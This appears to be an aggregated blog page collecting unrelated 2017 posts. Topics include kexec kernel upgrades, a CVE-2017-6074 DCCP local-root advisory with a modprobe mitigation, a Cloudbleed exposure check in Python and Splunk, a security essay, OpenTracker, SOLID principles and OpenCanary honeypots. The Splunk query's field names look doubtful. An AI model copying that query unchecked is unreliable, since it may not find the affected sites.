rhel-3.10.0-229.20.1.el7
rhel-3.10.0-327.el7
rhel-3.10.0-327.3.1.el7
rhel-3.10.0-327.4.4.el7
rhel-3.10.0-327.4.5.el7
rhel-3.10.0-327.10.1.el7
rhel-3.10.0-327.13.1.el7
rhel-3.10.0-327.18.2.el7
rhel-3.10.0-327.22.2.el7
rhel-3.10.0-327.28.2.el7
rhel-3.10.0-327.28.3.el7
rhel-3.10.0-327.36.1.el7
rhel-3.10.0-327.36.2.el7
rhel-3.10.0-327.36.3.el7
rhel-3.10.0-514.el7
rhel-3.10.0-514.2.2.el7
rhel-3.10.0-514.6.1.el7
rhel-3.10.0-514.6.2.el7
rhel-2.6.18-92.1.10.el5
rhel-2.6.18-92.1.13.el5
rhel-2.6.18-92.1.17.el5
rhel-2.6.18-92.1.18.el5
rhel-2.6.18-92.1.22.el5
rhel-2.6.18-128.el5
rhel-2.6.18-128.1.1.el5
rhel-2.6.18-128.1.6.el5
rhel-2.6.18-128.1.10.el5
rhel-2.6.18-128.1.14.el5
rhel-2.6.18-128.1.16.el5
rhel-2.6.18-128.2.1.el5
rhel-2.6.18-128.4.1.el5
rhel-2.6.18-128.7.1.el5
rhel-2.6.18-149.el5
rhel-2.6.18-164.el5
rhel-2.6.18-164.2.1.el5
rhel-2.6.18-164.6.1.el5
rhel-2.6.18-164.9.1.el5
rhel-2.6.18-164.10.1.el5
rhel-2.6.18-164.11.1.el5
rhel-2.6.18-164.15.1.el5
rhel-2.6.18-194.el5
rhel-2.6.18-194.3.1.el5
rhel-2.6.18-194.8.1.el5
rhel-2.6.18-194.11.1.el5
rhel-2.6.18-194.11.3.el5
rhel-2.6.18-194.11.4.el5
rhel-2.6.18-194.17.1.el5
rhel-2.6.18-194.17.4.el5
rhel-2.6.18-194.26.1.el5
rhel-2.6.18-194.32.1.el5
rhel-2.6.18-238.el5
rhel-2.6.18-238.1.1.el5
rhel-2.6.18-238.5.1.el5
rhel-2.6.18-238.9.1.el5
rhel-2.6.18-238.12.1.el5
rhel-2.6.18-238.19.1.el5
rhel-2.6.18-274.el5
rhel-2.6.18-274.3.1.el5
rhel-2.6.18-274.7.1.el5
rhel-2.6.18-274.12.1.el5
rhel-2.6.18-274.17.1.el5
rhel-2.6.18-274.18.1.el5
rhel-2.6.18-308.el5
rhel-2.6.18-308.1.1.el5
rhel-2.6.18-308.4.1.el5
rhel-2.6.18-308.8.1.el5
rhel-2.6.18-308.8.2.el5
rhel-2.6.18-308.11.1.el5
rhel-2.6.18-308.13.1.el5
rhel-2.6.18-308.16.1.el5
rhel-2.6.18-308.20.1.el5
rhel-2.6.18-308.24.1.el5
rhel-2.6.18-348.el5
rhel-2.6.18-348.1.1.el5
rhel-2.6.18-348.2.1.el5
rhel-2.6.18-348.3.1.el5
rhel-2.6.18-348.4.1.el5
rhel-2.6.18-348.6.1.el5
rhel-2.6.18-348.12.1.el5
rhel-2.6.18-348.16.1.el5
rhel-2.6.18-348.18.1.el5
rhel-2.6.18-371.el5
rhel-2.6.18-371.1.2.el5
rhel-2.6.18-371.3.1.el5
rhel-2.6.18-371.4.1.el5
rhel-2.6.18-371.6.1.el5
rhel-2.6.18-371.8.1.el5
rhel-2.6.18-371.9.1.el5
rhel-2.6.18-371.11.1.el5
rhel-2.6.18-371.12.1.el5
rhel-2.6.18-398.el5
rhel-2.6.18-400.el5
rhel-2.6.18-400.1.1.el5
rhel-2.6.18-402.el5
rhel-2.6.18-404.el5
rhel-2.6.18-406.el5
rhel-2.6.18-407.el5
rhel-2.6.18-408.el5
rhel-2.6.18-409.el5
rhel-2.6.18-410.el5
rhel-2.6.18-411.el5
rhel-2.6.18-412.el5
rhel-2.6.18-416.el5
rhel-2.6.18-417.el5
rhel-2.6.18-418.el5

Compare that to kpatch or kgraft.

Historically, Autoptimize used its own JS implementation to defer the loading of the main CSS, hooking into the domContentLoaded event, and this has worked fine. I knew about Filament Group’s loadCSS, but saw no urgent reason to implement it as I saw no big advantages over my homegrown solution. That changed when criticalcss.com’s Jonas contacted me, pointing out that the best way to load CSS is now the rel="preload" approach, which as of loadCSS 1.3 is also the way loadCSS works:

<link rel="preload" href="path/to/mystylesheet.css" as="style" onload="this.rel='stylesheet'">

As rel="preload" currently is only supported by Chrome & Opera (both Blink-based), a JS polyfill is needed for other browsers which uses loadCSS to load the CSS. Hopefully other browsers catch up on rel="preload" because it is a very elegant solution which allows the CSS to load sooner then with the old code while still being non-render blocking. What more could one which for (“Unicorns” my 10yo daughter might say, but what does she know)?

Anyway, I have integrated this new approach in a separate branch on GitHub; you can download the zip-file here to test this and all the other fixes and improvements since 2.1.0. Let me know what you think. Happy preloading!

Yesterday, Cloudflare posted an incident report on their blog about an issue discovered in their HTML parser. A very nice report which is worth a read! As usual in our cyber world, this vulnerability quickly received a nice name and logo: “Cloudbleed“. I won’t explain the vulnerability in detail here; there are already multiple reviews of this incident.

According to Cloudflare, the impact is the following:

This included HTTP headers, chunks of POST data (perhaps containing passwords), JSON for API calls, URI parameters, cookies and other sensitive information used for authentication (such as API keys and OAuth tokens).

A lot of interesting data could be disclosed, so my biggest concern was: “Am I affected by Cloudbleed?” Cloudflare being a key player on the Internet, the chances of visiting websites protected by their services are very high. How to make an inventory of those websites? The idea is to use Splunk to achieve this: if your DNS resolver logs are indexed by Splunk, you can use a lookup table to search for IP addresses belonging to Cloudflare.

Cloudflare is transparent and publicly announces the IP subnets they use (both IPv4 & IPv6). By default, Splunk does not perform lookups on CIDR ranges directly. I created the complete list of IP addresses with a few lines of Python:

#!/usr/bin/python
# IP Sources:
# https://www.cloudflare.com/ips/
from netaddr import IPNetwork

# Expand every Cloudflare CIDR block into individual IP addresses, one per line.
cidrs = [
  '103.21.244.0/22', '103.22.200.0/22', '103.31.4.0/22', '104.16.0.0/12',
  '108.162.192.0/18', '131.0.72.0/22', '141.101.64.0/18', '162.158.0.0/15',
  '172.64.0.0/13', '173.245.48.0/20', '188.114.96.0/20', '190.93.240.0/20',
  '197.234.240.0/22', '198.41.128.0/17', '199.27.128.0/21' ]
for cidr in cidrs:
  for ip in IPNetwork(cidr):
    print('%s' % ip)  # works with both Python 2 and 3
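To run it you need the netaddr module; assuming you saved the script as cloudflare_ips.py (the file name is just an example), generating the CSV is straightforward:

$ pip install netaddr
$ python cloudflare_ips.py > cloudflare.csv

Depending on how you define the lookup in Splunk, you may need to add a header line naming the column (for example "ip") to the generated file.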

The generated file can now be imported as a lookup table in Splunk. My DNS requests are logged through a Bro instance. Using the following query, I extracted URLs that are resolved with a Cloudflare IP address:

sourcetype=bro_dns rcode=A NOT qclass = "*.cloudflare.com" |
lookup cloudflare.csv TTLs OUTPUT TTLs as ip |
search ip="*" |
dedup qclass |
table qclass

(The query is very easy to adapt to your own environment.)

Over the last 6 months, I got a list of 158 websites. The last step is manual: review the URLs and, if you have accounts or posted sensitive information with them, it’s time to change your passwords / API keys!

[The post Am I Affected by Cloudbleed? has been first published on /dev/random]

February 23, 2017

The post Kernel patching with kexec: updating a CentOS 7 kernel without a full reboot appeared first on ma.ttias.be.

tl;dr: you can use kexec to stage a kernel upgrade in-memory without the need for a full reboot. Your system will reload the new kernel on the fly and activate it. Every running service will be restarted as the new kernel is loaded, but you skip the entire bootloader & hardware initialization.

By using kexec you can upgrade your running Linux machine's kernel without a full reboot. Keep in mind, there's still a new kernel load, but it's significantly faster than doing the whole bootloader stage and hardware initialization phase performed by the system firmware (BIOS or UEFI).

Yes, calling this kernel upgrades without reboots is a vast exaggeration. You skip parts of the reboot, though, usually the slowest parts.

Installing kexec

On a CentOS 7 machine the kexec tools should be installed by default, but just in case they aren't:

$ yum install kexec-tools

After that, the kexec binary should be available to you.

Install your new kernel

In this example I'll upgrade a rather old CentOS 7 kernel to the latest.

$ uname -r
3.10.0-229.14.1.el7

So I'm now running the 3.10.0-229.14.1.el7 kernel.

To upgrade your kernel, first install the latest kernel packages.

$ yum update kernel
...
===================================================================================
 Package                 Arch      Version                        Repository  Size
===================================================================================
Installing:
 kernel                  x86_64    3.10.0-514.6.1.el7             updates     37 M

This will install the 3.10.0-514.6.1.el7 kernel on my machine.

So a quick summary (on new lines, so you see the kernel version difference):

From: 3.10.0-229.14.1.el7
To: 3.10.0-514.6.1.el7

$ rpm -qa | grep kernel | sort
kernel-3.10.0-229.14.1.el7.x86_64
kernel-3.10.0-514.6.1.el7.x86_64

Once you installed the new kernel, it's time for the kexec in-memory upgrading magic.

In-memory kernel upgrade with kexec

As a safety measure, unload any previously staged kernels first. This is harmless and will make sure you start "cleanly" with your upgrade process.

$ kexec -u

Now, stage the new kernel to be loaded. Note that these are the version numbers of the latest kernel installed with yum, as shown above.

$ kexec -l /boot/vmlinuz-3.10.0-514.6.1.el7.x86_64 \
 --initrd=/boot/initramfs-3.10.0-514.6.1.el7.x86_64.img \
 --reuse-cmdline

Careful: the next command will reload the new kernel and will impact running services!

Once prepared, start kexec.

$ systemctl kexec

Your system will freeze for a couple of seconds, load the new kernel and be good to go.

Some benchmarks

A very quick and unscientific benchmark of doing a yum update kernel with and without kexec.

Normal way, kernel upgrade + reboot: 28s
Kexec way, kernel upgrade + reload: 19s

So you save a couple of seconds on the new kernel load; for big physical machines with lots of RAM, the gain will be even bigger, as the entire POST check can be skipped with this method.

Here's a side-by-side run of the same kernel update. On the left: the kexec flow you've read above. On the right, a classic yum update kernel && reboot.

Notice how the left VM never goes into the BIOS or POST checks.

If you're going to be automating these updates, have a look at some existing scripts to help get you going: kexec-reboot, ArchWiki on kexec.
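As a starting point of your own, here is a minimal sketch that stages the newest installed kernel, under the assumption of the CentOS 7 file layout used above; treat it as an illustration rather than a drop-in script.

#!/bin/bash
# Sketch: stage and load the newest installed kernel with kexec (assumes CentOS 7 paths).
set -e
KVER=$(rpm -q kernel --qf '%{VERSION}-%{RELEASE}.%{ARCH}\n' | sort -V | tail -n 1)
kexec -u                                        # unload any previously staged kernel
kexec -l "/boot/vmlinuz-${KVER}" \
      --initrd="/boot/initramfs-${KVER}.img" \
      --reuse-cmdline
systemctl kexec                                 # reloads the new kernel; running services restart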

The post Kernel patching with kexec: updating a CentOS 7 kernel without a full reboot appeared first on ma.ttias.be.

February 22, 2017

The post Linux kernel: CVE-2017-6074 – local privilege escalation in DCCP appeared first on ma.ttias.be.

Patching time, again.

This is an announcement about CVE-2017-6074 [1] which is a double-free
vulnerability I found in the Linux kernel. It can be exploited to gain
kernel code execution from an unprivileged processes.

[oss-security] Linux kernel: CVE-2017-6074: DCCP double-free vulnerability (local root)

This privilege escalation vulnerability is present in pretty much every kernel in use out there. CentOS 5, 6 and 7 are vulnerable, judging by their kernel versions.

The oldest version that was checked is 2.6.18 (Sep 2006), which is
vulnerable. However, the bug was introduced before that, probably in
the first release with DCCP support (2.6.14, Oct 2005).

The kernel needs to be built with CONFIG_IP_DCCP for the vulnerability
to be present. A lot of modern distributions enable this option by
default.

[oss-security] Linux kernel: CVE-2017-6074: DCCP double-free vulnerability (local root)

Red Hat's bug tracker provides some mitigation tactics that don't require updating the kernel and rebooting your box.

Recent versions of Selinux policy can mitigate this exploit. The steps below will work with SElinux enabled or disabled.

As the DCCP module will be auto loaded when required, its use can be disabled
by preventing the module from loading with the following instructions.

 # echo "install dccp /bin/true" >> /etc/modprobe.d/disable-dccp.conf 

The system will need to be restarted if the dccp modules are loaded. In most circumstances the dccp kernel modules will be unable to be unloaded while any network interfaces are active and the protocol is in use.

If you need further assistance, see this KCS article ( https://access.redhat.com/solutions/41278 ) or contact Red Hat Global Support Services.

(CVE-2017-6074) CVE-2017-6074 kernel: use after free in dccp protocol

More details are hidden behind Red Hat's subscription wall, but the mitigation tactic shown above should be sufficient in most cases.

In fact, there don't seem to be updated kernel packages for CentOS just yet, so the above is -- at the time of writing -- the only mitigation tactic you have.
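Whether the mitigation is needed (or already in effect) on a given box can be checked quickly by looking for the dccp module:

$ lsmod | grep dccp || echo "dccp not loaded"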

The post Linux kernel: CVE-2017-6074 – local privilege escalation in DCCP appeared first on ma.ttias.be.

Security is a term on everyone's lips, yet very few people are able to define it and think about it rationally.

I propose the following definition:

“Security is the set of actions and measures put in place by a community to ensure that its members respect the community's rules.”

Note that individual safety is only guaranteed if it is explicit in the community's rules. If the rules state that killing is permitted, for example of slaves, those individuals are not safe.

These actions and measures fall into three broad categories, which I call the three pillars of security: morality, consequences and cost.

The moral pillar

The first pillar is the set of moral incentives that encourage the individual to respect society's rules. This pillar therefore acts at the individual level and is transmitted through education and propaganda.

An excellent example of the use of the moral pillar is “music piracy”. Through relentless propaganda, the big record labels have drilled into people's heads that downloading a song was virtually equivalent to robbing, or even hurting, an artist.

This claim is rationally absurd, but the moral conditioning has been such that, even today, pirating music is perceived as immoral. Amusingly, the phenomenon is far weaker for software or TV series, because the “robbed artist” angle is much less vivid in the collective imagination for those kinds of works.

The pillar of consequences

The second pillar is a factor obtained by multiplying the risk of being caught breaking the rules by the consequence incurred when caught in the act.

For example, despite numerous attempts to use the moral pillar through road-safety campaigns, most drivers do not respect speed limits.

Fines were therefore introduced, sometimes very high ones. But those fines are not a deterrent if the driver feels that the risk of being caught is nil. Zero multiplied by a big fine is still zero.

Speed checks were therefore set up, with attempts to keep them secret and to ban radar detectors. But here again, effectiveness turned out to be limited, the risk still being perceived as low and a matter of “bad luck”.

On the other hand, installing automatic speed cameras with big “speed camera ahead” signs has had a drastic effect on those particular spots. Drivers slow down and respect the limit, even if only for a limited stretch.

The pillar of cost

Finally, there are situations where people don't care about morality or consequences. The last security pillar therefore consists in raising the cost of breaking the rules.

That cost can take different forms: time, money, expertise, equipment.

For example, I know that a bicycle thief doesn't care about the moral pillar. He also has little chance of getting caught, so the pillar of consequences doesn't scare him either. I can slightly raise his risk of being caught by having my bike engraved, but the effect is small.

On the other hand, I can make stealing my bike as costly as possible by using a very good lock.

Stealing my bike will then require more time and more equipment than if my lock were a basic one.

The locks on your door are nothing more than an increase in the cost of getting into your home without the key. That cost will be either time (if the door has to be forced) or expertise (a locksmith will open your door in a few seconds).

Security theatre

Every security measure taken must act on one of these three pillars. A measure may even affect several pillars at once. By increasing the time needed to break a rule (cost pillar), you also increase the perceived risk of getting caught (consequences pillar).

However, there are also measures that fall into none of these categories. Such measures, then, are not measures aimed at increasing security.

Take, for example, soldiers patrolling the streets to counter the risk of a deranged terrorist blowing himself up. Soldiers clearly have no influence on the moral pillar. They have no influence on the pillar of consequences (a suicide bomber couldn't care less about consequences). And they have no influence on cost either. If you want to blow yourself up, the presence of armed soldiers nearby changes nothing about your plans!

This analysis therefore matters, because it makes it possible to detect non-security measures. Those measures are not about security; they have other motivations. For example, soldiers in the street serve to give the population the impression that the government is acting. Indeed, the only relevant action against terrorism is intelligence work and discreet operations, but then the population would get the impression that the government is doing nothing.

Measures that do not strengthen security but only serve to project an image of reinforced security are called “security theatre”. In some cases these measures are justified (they reassure people); in others they are harmful (they create a feeling of irrational fear and are themselves a source of insecurity).

Another example: in the United States, several Republican-led states have introduced measures supposedly to protect against electoral fraud. The problem: these measures are utterly ineffective and address a problem whose existence has never been demonstrated, but they do have an immediate effect. They make voting very difficult, if not impossible, for a large share of minorities and of the poorest populations, who tend to vote Democrat. Under the cover of security, measures are taken whose real goal is to favor one party.

Identifying security abuses

When security measures are put in place and do not act effectively on any of the three pillars, you need to be vigilant: the motivation is not security but almost certainly something else.

When measures are taken supposedly to guarantee your security, always ask yourself the right questions:

– Is the problem quantified in terms of severity and probability?
– Do the proposed measures effectively address at least one of the three pillars?
– Are the cost and the consequences of these measures proportionate to the risk they protect against?

But if we apply rationality to security, we reach the staggering conclusion that, to protect ourselves, we should be taking drastic measures to regulate car traffic, the quality of our food and of the air we breathe. Instead, we let our emotions be manipulated, we send soldiers to risk their lives all over the world, or we fight against disc brakes on bicycles.

Deep down, we are not looking for security; we are looking to be reassured without having to change anything about our way of life. And what could be more fitting for that than a common enemy and a totalitarian regime to keep us from thinking?

 

Photo by CWCS Managed Hosting.

This text was published thanks to your regular support on Tipeee and on Paypal. I am @ploum, blogger, writer, speaker and futurologist. You can follow me on Facebook, Medium or contact me.

This text is published under the CC-By BE license.

February 21, 2017

It’s been a while since my last post (18/01/2014) … This year I made a new year’s resolution to blog more (like I did in the good old days).

My first post since the silent years will be a bit of reflection on why I haven't actually blogged much and what I did instead. There are of course a lot of reasons why, but in essence it boils down to something very simple: you set yourself priorities, and whenever you don't have much time, you abandon the things that don't have a high priority … so blogging was not as important to me as my family, my work, … (you get the picture).

But there is actually another 'good' reason: information overload. I'm constantly reading, viewing presentations, doing small proofs of concept, … and doing these things has taken the place of producing content myself … I hope I can do better in 2017 … let's see 🙂

So what did I do in the last couple of years on the technical side:

Webpack + React + Redux

People who know me are aware that I sometimes complain about the JavaScript ecosystem. On a regular basis I need to decide which technologies we are going to use to build a system that needs to be maintained for many years. During the last 4 years I've done assessments of which frontend framework to use. At times it really felt like the well-known blog post.

I'm pretty glad the JavaScript ecosystem is stabilising (or so it seems). I decided to take a deep dive into Webpack, React, Redux, …

simple conclusion: I’m glad I took the time to learn all these technologies a bit more in depth.

Vert.x

I've done several small NodeJS projects; for bigger applications I'm still more a fan of the Java / JVM world, as it still feels more mature to me. However, the concept of Node is simple and elegant, so if you have a similar solution in your preferred ecosystem, you need to do some investigating … right?

simple conclusion: I’m glad I took the time to learn all these technologies a bit more in depth.

Amazon Web Services

Using one of the online learning platforms, I took a pretty long track covering a lot of the features of the AWS platform. I've been a frequent user of their services, but they are constantly inventing new things and there were still some blind spots for me. That's now much better after guided training and experiments.

simple conclusion: I’m glad I took the time to learn all these technologies a bit more in depth.

Scala course

On Coursera I followed a course on Scala. I had already followed some talks and presentations, but had never programmed in it myself. During this session I was obliged to write Scala code myself. The least I can say is that it was … interesting 🙂

simple conclusion: I'm glad I took it, but I will have to look for a more hands-on track, as this one was a bit too focused on theory instead of building real-world applications.

NoSQL Tracks

I've done courses on MongoDB and Elasticsearch. Both are very nice products with their own positive and negative points. I'm using these technologies in several of our production systems and things are stable. Like with all technologies, there is some adapting and learning how they behave in a production environment, but they fill the gap that needed filling. So I'm glad we took this road.

simple conclusion: I’m glad I took the time to learn all these technologies a bit more in depth.

Mobile Development

My company builds server-side applications, frontend applications and also mobile applications. In the previous company I founded, I wasn't "officially" allowed to build mobile apps, so I had to beef up on this … which I did. In the meantime, I've built applications using Xamarin, native Android and native iOS (Objective-C; Swift is on the todo list) and Ionic (React Native is on the todo list).

Very simple conclusion: doing what you love without technological impediments is how every developer's life should be …

I’ll keep some more for my next post, but I’ll also do some more real technical articles.

See you soon (or so I hope)

February 20, 2017

This is an ode to Dirk Engling’s OpenTracker.

It’s a BitTorrent tracker.

It’s what powered The Pirate Bay in 2007–2009.

I've been using it to power the downloads on http://driverpacks.net since the end of November 2010. That's more than 6 years. It has facilitated 9,839,566 downloads from December 1, 2010 until today. That's almost 10 million downloads!

Stability

It's one of the most stable pieces of software I have ever encountered. I compiled it in 2010 and it has never once crashed. I've seen uptimes of hundreds of days.

wim@ajax:~$ ls -al /data/opentracker
total 456
drwxr-xr-x  3 wim  wim   4096 Feb 11 01:02 .
drwxr-x--x 10 root wim   4096 Mar  8  2012 ..
-rwxr-xr-x  1 wim  wim  84824 Nov 29  2010 opentracker
-rw-r--r--  1 wim  wim   3538 Nov 29  2010 opentracker.conf
drwxr-xr-x  4 wim  wim   4096 Nov 19  2010 src
-rw-r--r--  1 wim  wim 243611 Nov 19  2010 src.tgz
-rwxrwxrwx  1 wim  wim  14022 Dec 24  2012 whitelist

Simplicity

The simplicity is fantastic. Getting up and running is incredibly simple: git clone git://erdgeist.org/opentracker .; make; ./opentracker and you're done. Let me quote a bit from its homepage, to show that it goes the extra mile to make users successful:

opentracker can be run by just typing ./opentracker. This will make opentracker bind to 0.0.0.0:6969 and happily serve all torrents presented to it. If ran as root, opentracker will immediately chroot to . and drop all priviliges after binding to whatever tcp or udp ports it is requested.

Emphasis mine. And I can’t emphasize my emphasis enough.

Performance & efficiency

All the while handling dozens of requests per second, opentracker causes less load than background processes of the OS. Let me again quote a bit from its homepage:

opentracker can easily serve multiple thousands of requests on a standard plastic WLAN-router, limited only by your kernels capabilities ;)

That’s also what the homepage said in 2010. It’s one of the reasons why I dared to give it a try. I didn’t test it on a “plastic WLAN-router”, but everything I’ve seen confirms it.

Flexibility

Its defaults are sane, but what if you want to have a whitelist?

  1. Uncomment the #FEATURES+=-DWANT_ACCESSLIST_WHITE line in the Makefile.
  2. Recompile.
  3. Create a file called whitelist, with one torrent hash per line.

Have a need to update this whitelist, for example a new release of your software to distribute? Of course you don’t want to reboot your opentracker instance and lose all current state. It’s got you covered:

  1. Append a line to whitelist.
  2. Send the SIGHUP UNIX signal to make opentracker reload its whitelist1.

Deployment

I’ve been in the process of moving off of my current (super reliable, but also expensive) hosting. There are plenty of specialized companies offering HTTP hosting2 and even rsync hosting3. Thanks to their standardization and consequent scale, they can offer very low prices.

But I also needed to continue to run my own BitTorrent tracker. There are no companies that offer that. I don’t want to rely on another tracker, because I want there to be zero affiliation with illegal files4. This is a BitTorrent tracker that does not allow anything to be shared: it only allows the software releases made by http://driverpacks.net to be downloaded.

So, I found the cheapest VPS I could find, with the least amount of resources. For USD $13.505, I got the lowest specced VPS from a reliable-looking provider: with 128 MB RAM. Then I set it up:

  1. ssh‘d onto it.
  2. rsync‘d over the files from my current server (alternatively: git clone and make)
  3. added @reboot /data/opentracker/opentracker -f /data/opentracker/opentracker.conf to my crontab.
  4. removed the CNAME record for tracker.driverpacks.net, and instead made it an A record pointing to my new VPS.
  5. watched http://tracker.driverpacks.net:6969/stats?mode=tpbs&format=txt on both the new and the old server, to verify traffic was moving over to my new cheap opentracker VPS as the DNS changes propagated

Drupal module

Since driverpacks.net runs on Drupal, there of course is an OpenTracker Drupal module to integrate the two (I wrote it). It provides an API to:

  • create .torrent files for certain files uploaded to Drupal
  • append to the OpenTracker whitelist file6
  • parse the statistics provided by the OpenTracker instance

You can see the live stats at http://driverpacks.net/stats.

Conclusion

opentracker is the sort of simple, elegant software design that makes it a pleasure to use. And considering the low commit frequency over the past decade, with many of those commits being nitpick fixes, its simplicity also seems to lead to excellent maintainability. It involves the HTTP and BitTorrent protocols, yet relies on only a single I/O library, and its source code is very readable. Not only that, but it's also highly scalable.

It’s the sort of software many of us aspire to write.

Finally, its license. A glorious license indeed!

The beerware license is very open, close to public domain, but insists on honoring the original author by just not claiming that the code is yours. Instead assume that someone writing Open Source Software in the domain you’re obviously interested in would be a nice match for having a beer with.

So, just keep the name and contact details intact and if you ever meet the author in person, just have an appropriate brand of sparkling beverage choice together. The conversation will be worth the time for both of you.

Dirk, if you read this: I’d love to buy you sparkling beverages some time :)


  1. kill -s HUP $(pidof opentracker) ↩︎

  2. I’m using Gandi’s Simple Hosting↩︎

  3. https://rsync.net ↩︎

  4. Also: all my existing torrents use http://tracker.driverpacks.net:6969/announce as the URL. The free trackers I could find were all using udp://. So new leechers would then no longer be able to find the hundreds of existing seeders. Adding trackers to already-downloaded torrents is not possible. ↩︎

  5. $16.34 including 21% Belgian VAT↩︎

  6. Rather than having the Drupal module send a SIGHUP from within PHP, which requires elevated rights, I instead opted for a cronjob that runs every 10 minutes: */10 * * * * kill -s HUP $(pidof opentracker)↩︎

February 18, 2017

February 17, 2017

Alternative title: Dan North, the Straw Man That Put His Head in His Ass.

This blog post is a reply to Dan’s presentation Why Every Element of SOLID is Wrong. It is crammed full of straw man argumentation in which he misinterprets what the SOLID principles are about. After refuting each principle he proposes an alternative, typically a well-accepted non-SOLID principle that does not contradict SOLID. If you are not that familiar with the SOLID principles and cannot spot the bullshit in his presentation, this blog post is for you. The same goes if you enjoy bullshit being pointed out and broken down.

What follows are screenshots of select slides with comments on them underneath.

Dan starts by asking “What is a single responsibility anyway?”. Perhaps he should have figured that out before giving a presentation about how it is wrong.

A short (non-comprehensive) description of the principle: systems change for various different reasons. Perhaps a database expert changes the database schema for performance reasons, perhaps a User Interface person is reorganizing the layout of a web page, perhaps a developer changes business logic. What the Single Responsibility Principle says is that ideally changes for such disparate reasons do not affect the same code. If they did, different people would get in each other’s way. Possibly worse still, if the concerns are mixed together and you want to change some UI code, you suddenly need to deal with, and thus understand, the business logic and database code.

How can we predict what is going to change? Clearly you can’t, and this is simply not needed to follow the Single Responsibility Principle or to get value out of it.

Write simple code… no shit. One of the best ways to write simple code is to separate concerns. You can be needlessly vague about it and simply state “write simple code”. I’m going to label this Dan North’s Pointlessly Vague Principle. Congratulations sir.

The idea behind the Open Closed Principle is not that complicated. To partially quote the first line on the Wikipedia Page (my emphasis):

… such an entity can allow its behaviour to be extended without modifying its source code.

In other words, when you ADD behavior, you should not have to change existing code. This is very nice, since you can add new functionality without having to rewrite old code. Contrast this to shotgun surgery, where to make an addition, you need to modify existing code at various places in the codebase.

In practice, you cannot gain full adherence to this principle, and you will have places where you will need to modify existing code. Full adherence to the principle is not the point. Like with all engineering principles, they are guidelines which live in a complex world of trade offs. Knowing these guidelines is very useful.
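To make the idea concrete, here is a minimal, hypothetical sketch (my own example, not taken from Dan's talk) of what "open for extension, closed for modification" looks like in practice:

# A tiny illustration of the Open Closed Principle: new behaviour is added
# by writing a new class, not by editing existing code.
class Notifier:
    def send(self, message):
        raise NotImplementedError

class EmailNotifier(Notifier):
    def send(self, message):
        print("email: " + message)

def notify_all(notifiers, message):
    for notifier in notifiers:
        notifier.send(message)

# Adding SMS support later requires no change to Notifier, EmailNotifier or
# notify_all; we only add a new class and pass an instance of it in.
class SmsNotifier(Notifier):
    def send(self, message):
        print("sms: " + message)

notify_all([EmailNotifier(), SmsNotifier()], "build finished")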

Clearly it’s a bad idea to leave code in place that is wrong after a requirement change. That’s not what this principle is about.

Another very informative “simple code is a good thing” slide.

To be honest, I’m not entirely sure what Dan is getting at with his “is-a, has-a” vs “acts-like-a, can-be-used-as-a”. It does make me think of the Interface Segregation Principle, which, coincidentally, is the next principle he misinterprets.

The remainder of this slide is about the “favor composition over inheritance” principle. This is really good advice, which has been well-accepted in professional circles for a long time. This principle is about code sharing, which is generally better done via composition than inheritance (the latter creates very strong coupling). In the last big application I wrote there are several hundred classes and less than a handful inherit concrete code. Inheritance has a use which is completely different from code reuse: sub-typing and polymorphism. I won’t go into detail about those here, and will just say that this is at the core of what Object Orientation is about, and that even in the application I mentioned, this is used all over, making the Liskov Substitution Principle very relevant.

Here Dan is slamming the principle for being too obvious? Really?

“Design small, role-based classes”. Here Dan changed “interfaces” into “classes”. Which results in a line that makes me think of the Single Responsibility Principle. More importantly, there is a misunderstanding about the meaning of the word “interface” here. This principle is about the abstract concept of an interface, not the language construct that you find in some programming languages such as Java and PHP. A class forms an interface. This principle applies to OO languages that do not have an interface keyword such as Python and even to those that do not have a class keyword such as Lua.

If you follow the Interface Segregation Principle and create interfaces designed for specific clients, it becomes much easier to construct or invoke those clients. You won’t have to provide additional dependencies that your client does not actually care about. In addition, if you are doing something with those extra dependencies, you know this client will not be affected.

This is a bit bizarre. The definition Dan provides is good enough, even though it is incomplete, which can be excused by it being a slide. From the slide it’s clear that the Dependency Inversion Principle is about dependencies (who would have guessed) and coupling. The next slide is about how reuse is overrated. As we’ve already established, this is not what the principle is about.

As to the DIP leading to DI frameworks that you then depend on… this is like saying that if you eat food you might eat non-nutritious food which is not healthy. The fix here is to not eat non-nutritious food, it is not to reject food altogether. Remember the application I mentioned? It uses dependency injection all the way, without using any framework or magic. In fact, 95% of the code does not bind to the web-framework used due to adherence to the Dependency Inversion Principle. (Read more about this application)
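For readers who have never seen framework-free dependency injection, here is a minimal, hypothetical sketch (my own example, not code from that application):

# Hypothetical constructor injection without any framework or container:
# high-level code receives its dependency as an abstraction instead of
# constructing a concrete class itself.
class UserRepository:
    def find_name(self, user_id):
        raise NotImplementedError

class SqlUserRepository(UserRepository):
    def __init__(self, connection):
        self.connection = connection
    def find_name(self, user_id):
        return "Alice"  # a real implementation would query the database

class Greeter:
    def __init__(self, repository):  # the dependency is injected here
        self.repository = repository
    def greet(self, user_id):
        return "Hello " + self.repository.find_name(user_id)

# Wiring happens once, at the edge of the application.
greeter = Greeter(SqlUserRepository(connection=None))
print(greeter.greet(42))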

That attitude explains a lot about the preceding slides.

Yeah, please do write simple code. The SOLID principles and many others can help you with this difficult task. There is a lot of hard-won knowledge in our industry and many problems are well understood. Frivolously rejecting that knowledge with “I know better” is an act of supreme arrogance and ignorance.

I do hope this is the category Dan falls into, because the alternative of purposefully misleading people for personal profit (attention via controversy) rustles my jimmies.

If you’re not familiar with the SOLID principles, I recommend you start by reading their associated Wikipedia pages. If you are like me, it will take you practice to truly understand the principles and their implications and to find out where they break down or should be superseded. Knowing about them and keeping an open mind is already a good start, which will likely lead you to many other interesting principles and practices.

February 15, 2017

Being a volunteer for the SANS Internet Storm Center, I'm a big fan of the DShield service. I think that I have been feeding DShield with logs for eight or nine years now. In 2011, I wrote a Perl script to send my OSSEC firewall logs to DShield. This script has been running and pushing my logs every 30 minutes for years. Later, DShield was extended to collect other logs: SSH credentials collected by honeypots (if you have an unused Raspberry Pi, there is a nice honeypot setup available). I have my own network of honeypots spread here and there on the Wild Internet, running Cowrie. But recently, I reconfigured all of them to use another type of honeypot: OpenCanary.

Why OpenCanary? Cowrie is a very nice honeypot which can emulate a fake vulnerable host, log the commands executed by attackers and also collect dropped files. Here is an example of a Cowrie session replayed in Splunk:

Splunk Honeypot Session Replay

It's nice to capture a lot of data but most of it (not to say “all of it”) is generated by bots. Honestly, I have never detected a human attacker trying to abuse my SSH honeypots. That's why I decided to switch to OpenCanary. It does not record as detailed a log as Cowrie, but it is very modular and supports the following protocols by default:

  • FTP
  • HTTP
  • Proxy
  • MSSQL
  • MySQL
  • NTP
  • Portscan
  • RDP
  • Samba
  • SIP
  • SNMP
  • SSH
